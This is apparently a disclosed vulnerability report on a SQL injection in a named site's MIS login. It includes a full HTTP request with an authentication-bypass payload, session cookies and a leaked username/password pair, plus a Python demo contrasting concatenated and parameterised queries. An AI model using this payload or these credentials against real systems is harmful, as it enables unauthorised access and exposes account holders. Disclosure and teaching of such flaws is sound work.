2015-09-14: Details sent to the vendor, awaiting vendor handling
2015-09-14: Vendor confirmed; details disclosed to the vendor only
2015-09-24: Details disclosed to core white hats and relevant domain experts
2015-10-04: Details disclosed to ordinary white hats
2015-10-14: Details disclosed to intern white hats
2015-10-29: Details disclosed to the public
As the title says.
Extending the injection
POST /index.php?action=post.login HTTP/1.1
Host: mis.iciba.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://mis.iciba.com/index.php?action=login
Content-Length: 53
Cookie: _ustat=%7B%22i%22%3A0%2C%22n%22%3A%22guest%22%2C%22e%22%3Anull%2C%22s%22%3A%7B%22e%22%3Afalse%2C%22m%22%3Afalse%2C%22u%22%3Afalse%7D%2C%22sid%22%3A%221b7603fb2ce89bcd4a5cb1200d85c702%22%7D; iciba_u_rand=c73ac4038e3bbc191a187644a1363e55%40101.71.243.74; iciba_u_rand_t=1442201527; Hm_lvt_ff8e5ea3d826cc3ff9e62f38fb25f05b=1442201530,1442201607; Hm_lpvt_ff8e5ea3d826cc3ff9e62f38fb25f05b=1442201607; PHPSESSID=30oo98co8vr2gl8pjjtrfimob4
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

username=admin' or' 1=1 --&password=admin' or' 1=1
This leaks a large number of TFTP and FTP accounts; the password hashes have already been cracked.
Pick any account, for example chenzeqing / chenzeqing, and log into the MIS management system.
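The login request above authenticates because the submitted username and password are spliced straight into the SQL statement. The following is an added illustration, not code from the report or from the affected site: a toy user table in SQLite (constructed data), the string-concatenated lookup that the report's payload bypasses, and the parameterised form that rejects it.

```python
import sqlite3

# Constructed sample accounts for the demo; not taken from the report's dump.
USERS = [("admin", "S3cret!"), ("chenzeqing", "chenzeqing")]

# The exact form values submitted in the report's login request.
PAYLOAD_USER = "admin' or' 1=1 --"
PAYLOAD_PASS = "admin' or' 1=1"


def make_db():
    """In-memory table standing in for the MIS user table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: the input becomes part of the SQL grammar.

    With the payload the WHERE clause turns into
      username='admin' or ' 1=1 --' AND password='admin' or ' 1=1'
    and the trailing ' 1=1' literal is truthy, so every row matches.
    """
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, username, password):
    """Bound parameters: the driver sends the values out of band, so quotes
    and keywords in the input are just characters to compare against.
    A real fix also replaces the unsalted MD5 seen in the dump with a
    slow salted hash (bcrypt/argon2) and compares against that."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD_USER, PAYLOAD_PASS))
    print("fixed:     ", login_fixed(db, PAYLOAD_USER, PAYLOAD_PASS))
```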
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-09-14 14:53
Thanks for the submission; we will follow up and handle it right away.
None